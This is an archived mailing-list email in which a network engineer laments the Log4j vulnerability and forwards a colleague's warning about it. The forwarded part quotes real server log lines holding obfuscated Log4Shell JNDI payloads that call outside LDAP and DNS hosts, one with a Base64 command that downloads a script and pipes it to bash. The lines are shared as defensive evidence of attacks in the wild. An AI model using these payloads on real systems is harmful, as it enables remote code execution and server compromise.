From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: from mail-il1-x12f.google.com (mail-il1-x12f.google.com [IPv6:2607:f8b0:4864:20::12f]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by lists.bufferbloat.net (Postfix) with ESMTPS id CA2EA3B29E for ; Mon, 13 Dec 2021 08:56:49 -0500 (EST) Received: by mail-il1-x12f.google.com with SMTP id w1so15026070ilh.9 for ; Mon, 13 Dec 2021 05:56:49 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20210112; h=mime-version:references:in-reply-to:from:date:message-id:subject:to :content-transfer-encoding; bh=QbMgdU1DcNVPYiJ5p9/Qo9A2sknBYwHt+f5KTCrQCeY=; b=Sm4+oxqICsCLJrhTgRP+a4xX7gUyYiUEGQ7qP1zQAu4/WquAsHagz3wGCYsbjPA8vk OD2E+7Y2CXb/vguYW+yJesmM638zdJ+V57WGXVfxrVAbRRzbpBwSCBqvEQ+cjrH7S44b tELAsneVA9rSr/P+KKSmXDeKEWz3tD7V7BtuJFkI8+YoluFNJ1npORZWG9EMSEJuSR5B pjWde1WvMqsUlKhxLnh+AM3RM6+nYc9j47dD8f1extDCc6IemHeS+zZ/a/vos8g4FKNJ yzfcsDiQ15ENpeS7Y+d5Msro3QXwWS9a/yy3qrfUAEwGf+aUkfLq0ktk0R4wM4WLBPSQ d2Bg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20210112; h=x-gm-message-state:mime-version:references:in-reply-to:from:date :message-id:subject:to:content-transfer-encoding; bh=QbMgdU1DcNVPYiJ5p9/Qo9A2sknBYwHt+f5KTCrQCeY=; b=pIuxAtXbuAw3hvi+Oc6y6f3nnqX1aJ3yymOKAw427/f4tQdkv7wn7zoIWMTjPAyvvZ wrFiSO4bpVEpRInL/tn6LepIRYN7DEhWBf2ZAiUXTYhqd7uXuJxCnBgRRRXaPL9adG4C bgAtsDEWhUWckDEwnl+lziNfGqq2jsZpUdQZTcqhDyyILRQnRzzrGV5F3ncMM7hn91gY dgNC02u6jm583HnCshaJhrgIdDD80tA1q+VeS9d07Fv027Rj750GfnAYvTRNqaRy+8+W P1byY10u7qR3YfyZ3ew1t7GMUstkP3Wv5gOstP6YZ63C/SVWskgQfw1LYUKx5RBpgaFL BRSA== X-Gm-Message-State: AOAM532+YZVHWJdGNe0xmobjI3/55s+k5Wiwn/tRlAaOx67JP4Uz3mnS BxmUqGW/U5NqbTf5o4gwyt3PtGepPu3jdCPJSfU2p5S1 X-Google-Smtp-Source: ABdhPJxY3AG0bkDjTyW+EwIb0gGw5xBkvuDzIl3J/KUwFKpiBYzv9uR0kuriJBTfZwNqwRz2y0TwPzJcgASF5gHroxU= X-Received: by 2002:a92:d30c:: with SMTP id x12mr87929ila.25.1639403808830; Mon, 13 Dec 2021 05:56:48 -0800 (PST) MIME-Version: 1.0 References: <9c4dc5e1-b35d-6a62-a8fc-cac729f585d1@foobar.org> <002401d7f00f$c4fa1b60$4eee5220$@ddostest.me> <41BB6B27-4870-49F2-BD83-354692A01081@ip-clear.de> <002901d7f012$24093620$6c1ba260$@ddostest.me> <003a01d7f014$fd8c6e10$f8a54a30$@ddostest.me> <12CBBEBF-6B38-4924-AA86-E5E94D77513E@ip-clear.de> In-Reply-To: <12CBBEBF-6B38-4924-AA86-E5E94D77513E@ip-clear.de> From: Dave Taht Date: Mon, 13 Dec 2021 05:56:36 -0800 Message-ID: To: bloat Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable Subject: [Bloat] Fwd: Log4j mitigation X-BeenThere: bloat@lists.bufferbloat.net X-Mailman-Version: 2.1.20 Precedence: list List-Id: General list for discussing Bufferbloat List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 13 Dec 2021 13:56:49 -0000 for those of you losing sleep over the java logging exploit, my heart goes out to you. While I'm glad I, personally, and on the bufferbloat related websites, haven't got a single thing written in java, and I lost 3 weeks of my life over christmas to spectre, and several weeks per year - and usually, right around christmas! coping with other CVE's.... this one seems so big and affecting so many other services I use, that I just kind of want to take all my cash out of the bank, and log out, and find a tropic island somewhere. ---------- Forwarded message --------- From: J=C3=B6rg Kost Date: Mon, Dec 13, 2021 at 3:43 AM Subject: Re: Log4j mitigation To: Jean St-Laurent Cc: You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL), in Headers, in anything related to where a Java process does logging with Log4j; it's innumerable. It might even evaluate from a URI itself; it won't use a fixed port. It's not wormy right now, but maybe it will soon. We are seeing things like this since 10th of Dec. And this is only a typical Apache Logfile for HTTP/HTTPS, where we do logging: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basi= c/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xND= E6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwK= XxiYXNo} GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80} GET /?x=3D${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interacts= h.com/a} HTTP/1.1" 200 - "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq= 8g7hluigcg5131oyyyt8e.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.= c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com} --=20 I tried to build a better future, a few times: https://wayforward.archive.org/?site=3Dhttps%3A%2F%2Fwww.icei.org Dave T=C3=A4ht CEO, TekLibre, LLC